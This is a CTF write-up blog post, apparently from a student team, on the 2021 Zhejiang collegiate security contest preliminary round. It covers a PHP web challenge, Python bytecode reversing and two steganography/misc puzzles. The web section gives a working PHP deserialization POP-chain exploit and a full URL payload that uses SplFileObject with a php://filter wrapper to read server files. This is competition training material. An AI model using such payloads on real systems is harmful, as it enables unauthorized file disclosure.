【CTF】第四届浙江省大学生网络与信息安全竞赛预赛部分WP
浏览 758 | 评论 0 | 字数 11171
Xunflash
2021年10月23日
  • W@v3s战队

    一、战队信息

    • 名称:W@v3s
    • 排名:9

    二、解题情况

    粘贴解题图片

    三、解题过程

    Web

    题目一名称 Checkin

    直接访问 Burp抓包即可得到flag

    关键步骤截图

    题目二名称 pppop

    Pop链的exp:

    <?php
    class A1{
        public $tmp1;
        public $tmp2;
    }
    class A3{
    }
    class A4{
        public $tmp1;
    }
    class A6{
        public $tmp1;
    }
    class A8{
    }
    $a1 = new A1();
    $a3 = new A3();
    $a4 = new A4();
    $a6 = new A6();
    $a8 = new A8();
    $a1->tmp1=$a3;
    $a3->tmp2=$a4;
    $a4->tmp1=$a6;
    $a6->tmp1=$a8;
    echo urlencode(serialize($a1));

    这时候会执行echo new $this->tmp1($this->tmp2);

    使用GlobIterator匹配通配符读文件

    flag在flaggggggggggg.php中

    SplFileObject+伪协议读文件

    ?DASCTF=O%3A2%3A%22A1%22%3A2%3A%7Bs%3A4%3A%22tmp1%22%3BO%3A2%3A%22A3%22%3A1%3A%7Bs%3A4%3A%22tmp2%22%3BO%3A2%3A%22A4%22%3A1%3A%7Bs%3A4%3A%22tmp1%22%3BO%3A2%3A%22A6%22%3A1%3A%7Bs%3A4%3A%22tmp1%22%3BO%3A2%3A%22A8%22%3A0%3A%7B%7D%7D%7D%7Ds%3A4%3A%22tmp2%22%3BN%3B%7D&DAS=SplFileObject&CTF=php://filter/convert.base64-encode/resource=flaggggggggggg.php

    base64解码即可得到flag

    PWN

    RE

    题目一 名称crackPYC

    python字节码,现场学的

    对着ppt尝试还原

    1           0 LOAD_CONST               0 (<code object keyinit at 0x0000028C1CC11D20, file "crackPYC.py", line 1>)
                  2 LOAD_CONST               1 ('keyinit')
                  4 MAKE_FUNCTION            0
                  6 STORE_NAME               0 (keyinit)
    
      8           8 LOAD_NAME                1 (__name__)
                 10 LOAD_CONST               2 ('__main__')
                 12 COMPARE_OP               2 (==)
                 14 POP_JUMP_IF_FALSE      250
    
      9          16 LOAD_NAME                2 (print)
                 18 LOAD_CONST               3 ('Can you crack pyc?')
                 20 CALL_FUNCTION            1
                 22 POP_TOP
    
     10          24 LOAD_NAME                3 (input)
                 26 LOAD_CONST               4 ('Plz give me your flag:')
                 28 CALL_FUNCTION            1
                 30 STORE_NAME               4 (str)//input
    
     11          32 LOAD_CONST               5 (108)
                 34 LOAD_CONST               6 (17)
                 36 LOAD_CONST               7 (42)
                 38 LOAD_CONST               8 (226)
                 40 LOAD_CONST               9 (158)
                 42 LOAD_CONST              10 (180)
                 44 LOAD_CONST              11 (96)
                 46 LOAD_CONST              12 (115)
                 48 LOAD_CONST              13 (64)
                 50 LOAD_CONST              14 (24)
                 52 LOAD_CONST              15 (38)
                 54 LOAD_CONST              16 (236)
                 56 LOAD_CONST              17 (179)
                 58 LOAD_CONST              18 (173)
                 60 LOAD_CONST              19 (34)
                 62 LOAD_CONST              20 (22)
                 64 LOAD_CONST              21 (81)
                 66 LOAD_CONST              22 (113)
                 68 LOAD_CONST              15 (38)
                 70 LOAD_CONST              23 (215)
                 72 LOAD_CONST              24 (165)
                 74 LOAD_CONST              25 (135)
                 76 LOAD_CONST              26 (68)
                 78 LOAD_CONST              27 (7)
    
     12          80 LOAD_CONST              28 (119)
                 82 LOAD_CONST              29 (97)
                 84 LOAD_CONST              30 (45)
                 86 LOAD_CONST              31 (254)
                 88 LOAD_CONST              32 (250)
                 90 LOAD_CONST              33 (172)
                 92 LOAD_CONST              34 (43)
                 94 LOAD_CONST              35 (62)
                 96 BUILD_LIST              32
                 98 STORE_NAME               5 (text)
    
     13         100 LOAD_NAME                6 (len)
                102 LOAD_NAME                4 (str)
                104 CALL_FUNCTION            1
                106 LOAD_CONST              36 (32)
                108 COMPARE_OP               3 (!=)
                110 POP_JUMP_IF_TRUE       140
                112 LOAD_NAME                4 (str)
                114 LOAD_CONST              37 (0)
                116 LOAD_CONST              27 (7)
                118 BUILD_SLICE              2
                120 BINARY_SUBSCR
                122 LOAD_CONST              38 ('DASCTF{')
                124 COMPARE_OP               3 (!=)
                126 POP_JUMP_IF_TRUE       140
                128 LOAD_NAME                4 (str)
                130 LOAD_CONST              39 (31)
                132 BINARY_SUBSCR
                134 LOAD_CONST              40 ('}')
                136 COMPARE_OP               3 (!=)
                138 POP_JUMP_IF_FALSE      154
    
     14     >>  140 LOAD_NAME                2 (print)
                142 LOAD_CONST              41 ('Bye bye~~')
                144 CALL_FUNCTION            1
                146 POP_TOP
    
     15         148 LOAD_NAME                7 (exit)
                150 CALL_FUNCTION            0
                152 POP_TOP
    
     16     >>  154 LOAD_NAME                8 (list)
                156 LOAD_NAME                4 (str)
                158 CALL_FUNCTION            1
                160 STORE_NAME               9 (st)
    
     17         162 BUILD_LIST               0
                164 STORE_NAME              10 (key)
    
     18         166 LOAD_NAME                0 (keyinit)
                168 LOAD_NAME               10 (key)
                170 CALL_FUNCTION            1
                172 POP_TOP
    
     19         174 SETUP_LOOP              48 (to 224)
                176 LOAD_NAME               11 (range)
                178 LOAD_CONST              36 (32)
                180 CALL_FUNCTION            1
                182 GET_ITER
            >>  184 FOR_ITER                36 (to 222)
                186 STORE_NAME              12 (i)
    
     20         188 LOAD_NAME               13 (ord)
                190 LOAD_NAME                4 (str)
                192 LOAD_NAME               12 (i)
                194 BINARY_SUBSCR
                196 CALL_FUNCTION            1
                198 LOAD_NAME               10 (key)
                200 LOAD_NAME               12 (i)
                202 LOAD_NAME                6 (len)
                204 LOAD_NAME               10 (key)
                206 CALL_FUNCTION            1
                208 BINARY_MODULO
                210 BINARY_SUBSCR
                212 BINARY_XOR
                214 LOAD_NAME                9 (st)
                216 LOAD_NAME               12 (i)
                218 STORE_SUBSCR
                220 JUMP_ABSOLUTE          184
            >>  222 POP_BLOCK
    
     21     >>  224 LOAD_NAME                9 (st)
                226 LOAD_NAME                5 (text)
                228 COMPARE_OP               2 (==)
                230 POP_JUMP_IF_FALSE      242
    
     22         232 LOAD_NAME                2 (print)
                234 LOAD_CONST              42 ('Congratulations and you are good at PYC!')
                236 CALL_FUNCTION            1
                238 POP_TOP
                240 JUMP_FORWARD             8 (to 250)
    
     24     >>  242 LOAD_NAME                2 (print)
                244 LOAD_CONST              43 ('Sorry,plz learn more about pyc.')
                246 CALL_FUNCTION            1
                248 POP_TOP
            >>  250 LOAD_CONST              44 (None)
                252 RETURN_VALUE
    
    Disassembly of <code object keyinit at 0x0000028C1CC11D20, file "crackPYC.py", line 1>:
      2           0 LOAD_CONST               1 (0)
                  2 STORE_FAST               1 (num)
    
      3           4 SETUP_LOOP              42 (to 48)
                  6 LOAD_GLOBAL              0 (range)
                  8 LOAD_CONST               2 (8)
                 10 CALL_FUNCTION            1
                 12 GET_ITER
            >>   14 FOR_ITER                30 (to 46)
                 16 STORE_FAST               2 (i)
    
      4          18 LOAD_FAST                1 (num)
                 20 LOAD_CONST               3 (7508399208111569251)
                 22 BINARY_SUBTRACT
                 24 LOAD_CONST               4 (4294967295)
                 26 BINARY_MODULO
                 28 STORE_FAST               1 (num)
    
      5          30 LOAD_FAST                0 (key)
                 32 LOAD_METHOD              1 (append)
                 34 LOAD_FAST                1 (num)
                 36 LOAD_CONST               5 (24)
                 38 BINARY_RSHIFT
                 40 CALL_METHOD              1
                 42 POP_TOP
                 44 JUMP_ABSOLUTE           14
            >>   46 POP_BLOCK
            >>   48 LOAD_CONST               0 (None)
                 50 RETURN_VALUE
    

    def keyinit(key):
        num=0
        for i in range(8):
            num=(num-7508399208111569251)%4294967295
            key.append(num>>24)
    #print('Can you crack pyc?')
    #str=input('Plz give me your flag:')
    text=[108,17,42,226,158,180,96,115,64,24,38,236,179,173,34,22,81,113,38,215,165,135,68,7,119,97,45,254,250,172,43,62]
    #if(len(str)!=32 and str[0:7]!='DASCTF{' and str[32]!='}'):
    #    print "Bye bye~~"
    #    exit()
    st=list(text)
    key=[]
    keyinit(key)
    print key
    print len(text)
    for i in range(32):
        st[i]=chr(text[i]^(key[i%len(key)]))
    print ''.join(st)

    Crypto

    MISC

    题目一 名称 听说你在找flag

    就硬爆

    压缩包密码是10801080

    之前在压缩包中看到只有你-副本.png中的crc是唯一的

    用winhex打开发现有一个data:image/png;base64,后面是一串base64

    很明显要把base64转成图片

    得到一张图片

    修改一下他的高度

    将下面那一串反转一下 base64解码 得到压缩包密码 Finding...

    flag就在flag.txt里

    题目二 名称 qrimg

    将gif图片提取一下

    得到300多张图片

    每一张图片在blue0处有一个二维码

    和队友在内网通上一人一百多张图片纯手撸

    最后得到的是Vm0xd1NtUXlWa1pPVldoVFlUSlNjRlJVVGtOalZsSlZWR3RPVlUxWGVIcFdiVFZyWVd4S2MxTnNXbFpOYmxJelZrUkdTMlJIVWtWV2JHUnBWa1ZaZWxaclkzaFdNbEpJVm10c1ZXSkdXbTlVVmxaM1ZWWmtWMVpzV214U2EzQllWMnRhYzFsV1NsVldiazVhWWtkU2RscEhlR0ZTVmtwMFpFWm9hR1ZzV2xoV1IzaHZVakpHUmsxSWJHeFNWR3hZV1ZSS1VtUXhVbFZTYkU1clVsUldTbGRyV2tkV2JGcEZVVlJWUFE9PQ==

    一直base64解码即可得到flag

    就re是自己做的,web队友带飞,misc纯合作,pwn一道没看,寄了

    本文作者:Xunflash
    本文链接:https://xunflash.top/index.php/archives/zjCTF_wp1.html
    最后修改时间:2021-10-25 21:29:55
    本站未注明转载的文章均为原创,并采用 CC BY-NC-SA 4.0 授权协议,转载请注明来源,谢谢!
    评论
    114514
    textsms
    支持 Markdown 语法
    email
    link
    评论列表
    暂无评论